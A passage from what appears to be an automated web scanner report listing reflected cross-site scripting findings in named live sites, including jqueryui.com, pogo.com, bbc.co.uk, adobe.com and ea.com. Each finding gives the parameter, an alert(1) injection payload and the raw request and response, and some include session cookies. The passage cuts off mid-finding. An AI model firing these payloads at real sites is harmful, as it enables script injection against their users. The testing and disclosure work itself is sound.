HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... derColorHeader=aaaaaa ...[SNIP]... |
3.545. http://jqueryui.com/themeroller/ [iconColorDefault parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109dc"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... olorContent=aaaaaa ...[SNIP]... |
3.546. http://jqueryui.com/themeroller/ [iconColorHeader parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b66d"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... -serif&fwDefault=normal ...[SNIP]... |
3.547. http://jqueryui.com/themeroller/ [iconColorHover parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0941"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... t=75&borderColorDefault ...[SNIP]... |
3.548. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbf1"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?8bbf1"><script>alert(1)< Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 117121 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
3.549. http://puzzle-games.pogo.com/games/bejeweled2 [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://puzzle-games.pogo |
Path: | /games/bejeweled2 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4250"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/bejeweled2?a4250"><script>alert(1)< Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Set-Cookie: prod.JID=D47044E3833 Content-Language: en-US Set-Cookie: com.pogo.unid=660635 Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:25:50 GMT Server: Apache-Coyote/1.1 Content-Length: 37734 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://puzzle-games ...[SNIP]... |
3.550. http://r.turn.com/server/pixel.htm [fpid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
Issue detail
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae761"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=ae761"><script>alert(1)< Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=3011330574290390485; pf=TiY2Y7UsIzsDKs0Lv |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:54 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:25:54 GMT Content-Length: 377 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
3.551. http://r.turn.com/server/pixel.htm [sp parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
Issue detail
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8f9"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=4 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=3011330574290390485; pf=TiY2Y7UsIzsDKs0Lv |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:54 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:25:54 GMT Content-Length: 377 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
3.552. http://revver.com/video/426755/peanut-labs/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://revver.com |
Path: | /video/426755/peanut-labs |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05e7"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/426755/peanut-labsf05e7"><script>alert(1)< Host: revver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:57:06 GMT Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 Expires: Sun, 09 Jan 2011 03:02:22 GMT Vary: Cookie Last-Modified: Sun, 09 Jan 2011 02:57:22 GMT ETag: 183ed9bf59280eb87751 Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 81323 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <form action="/account/login/ ...[SNIP]... |
3.553. http://themeforest.net/user/freshface/portfolio [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://themeforest.net |
Path: | /user/freshface/portfolio |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f0f8'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /user9f0f8'-alert(1)- Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sun, 09 Jan 2011 02:28:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 404 Not Found Content-Length: 20137 Set-Cookie: _fd_session=BAh7BjoP Cache-Control: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link href="h ...[SNIP]... _gaq.push(['_setAccount', 'UA-11834194-7']); _gaq.push(['_setDoma _gaq.push(['_trackPa _gaq.push(['_trackEvent', '404', 'http://themeforest.net (function() { var ga = document.createElement( ga.src = ('https:' == document.location ...[SNIP]... |
3.554. http://themeforest.net/user/freshface/portfolio [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://themeforest.net |
Path: | /user/freshface/portfolio |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3960e</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /user/freshface3960e</script><script Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sun, 09 Jan 2011 02:29:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 404 Not Found Content-Length: 20159 Set-Cookie: _fd_session=BAh7BjoP Cache-Control: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link href="h ...[SNIP]... sh(['_setAccount', 'UA-11834194-7']); _gaq.push(['_setDoma _gaq.push(['_trackPa _gaq.push(['_trackEvent', '404', 'http://themeforest.net (function() { var ga = document.createElement( ga.src = ('https:' == document.location g ...[SNIP]... |
3.555. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://word-games.pogo |
Path: | /games/scrabble |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9434a"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /games/scrabble?9434a"><script>alert(1)< Host: word-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:29:21 GMT Server: Apache-Coyote/1.1 Content-Length: 19674 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://word-games ...[SNIP]... |
3.556. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://word-games.pogo |
Path: | /games/scrabble |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12bcd"><a>1723ca1944 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /games/scrabble Host: word-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:31:03 GMT Server: Apache-Coyote/1.1 Content-Length: 19762 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://word-games ...[SNIP]... |
3.557. http://www.adobe.com/cfusion/marketplace/index.cfm [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /cfusion/marketplace |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b21e3"style%3d"xThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /cfusion/marketplace Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:26:19 GMT Server: JRun Web Server Set-Cookie: CFID=6624597;expires=Tue, 01-Jan-2041 05:26:21 GMT;path=/ Set-Cookie: CFTOKEN=1ea7f8d36106d894 Set-Cookie: DYLANSESSIONID=96302 Set-Cookie: UID=1C64D1BA%2D038F Set-Cookie: CFAUTHORIZATION_adobe_com Environment: webapp-da1-11.corp.adobe Content-Language: en-US Content-Language: en-US Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Set-Cookie: DylanApp-BigIP=877425674 Connection: close Vary: Accept-Encoding, User-Agent <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/cfusion/marke ...[SNIP]... |
3.558. http://www.bbc.co.uk/news/technology-12126880 [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.bbc.co.uk |
Path: | /news/technology-12126880 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b916d'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /news/technology-12126880 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=0 Content-Type: text/html Date: Sun, 09 Jan 2011 01:38:47 GMT Keep-Alive: timeout=10, max=777 Expires: Sun, 09 Jan 2011 01:38:47 GMT Connection: close Set-Cookie: BBC-UID=b47de209f191 Set-Cookie: BBC-UID=b47de209f191 Content-Length: 58609 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp <html xmlns="http://www.w3.org ...[SNIP]... <!-- bbc.fmtj.page = { serverTime: 1294537127000, editionToServe: 'us', queryString: 'b916d'-alert(1)- referrer: null, section: 'technology', sectionPath: '/Technology', siteName: 'BBC News', siteToServe: 'news', siteVersion: 'cream', storyId: '12126880', assetType: 'story', ...[SNIP]... |
3.559. http://www.cmsinter.net/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.cmsinter.net |
Path: | / |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d83a2"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?page_id=68&d83a2"><script>alert(1)< Host: www.cmsinter.net Proxy-Connection: keep-alive Referer: http://www.cmsinter.net/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=215573381 |
Response
HTTP/1.1 200 OK Date: Sat, 08 Jan 2011 22:46:41 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 X-Pingback: http://www.cmsinter.net Content-Type: text/html; charset=UTF-8 Content-Length: 15714 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http:/ ...[SNIP]... <form action="/?page_id=68&d83a2"><script>alert(1)< ...[SNIP]... |
3.560. http://www.e00.peanutlabs.com/js/iFrame/sc.php [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.e00.peanutlabs |
Path: | /js/iFrame/sc.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26db1'%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /js/iFrame/sc.php?userId Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.e00.peanutlabs Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AWSELB=052955471CE77 |
Response
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 09 Jan 2011 02:31:23 GMT Server: Apache Vary: Accept-Encoding,User Connection: keep-alive Content-Length: 583 <html> <head> <script type="text/javascript" src="http://static.e00 <script type="text/javascript" src="http://static.e00 ...[SNIP]... <script type="text/javascript"> userId = '998826224-3432-8939b9/26db1';alert(1)/ </script> ...[SNIP]... |
3.561. http://www.e00.peanutlabs.com/js/iFrame/sc.php [userId parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.e00.peanutlabs |
Path: | /js/iFrame/sc.php |
Issue detail
The value of the userId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bf13'%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /js/iFrame/sc.php?userId Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.e00.peanutlabs Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AWSELB=052955471CE77 |
Response
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 09 Jan 2011 02:30:25 GMT Server: Apache Vary: Accept-Encoding,User Connection: keep-alive Content-Length: 582 <html> <head> <script type="text/javascript" src="http://static.e00 <script type="text/javascript" src="http://static.e00 ...[SNIP]... <script type="text/javascript"> userId = '998826224-3432 </script> ...[SNIP]... |
3.562. http://www.ea.com/hasbro [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /hasbro |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63934"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hasbro63934"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:34 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=q1hu6pdtvde5 Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31126 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.563. http://www.ea.com/hasbro [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /hasbro |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ee5"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hasbro?50ee5"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:52 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=0l3r07fnbqfh Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70735 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="http://www.digg.com ...[SNIP]... |
3.564. http://www.ea.com/ipad [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /ipad |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6984"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ipade6984"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:19 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=q40if3obhass Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31125 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.565. http://www.ea.com/ipad [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /ipad |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a8a8"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ipad?7a8a8"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:04 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=0pkopsdhd3jh Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62200 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="http://www.digg.com ...[SNIP]... |
3.566. http://www.ea.com/iphone [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /iphone |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30d8"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iphonef30d8"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:29 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=2rji8o0i02qi Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31126 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.567. http://www.ea.com/iphone [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /iphone |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5498"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iphone?e5498"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
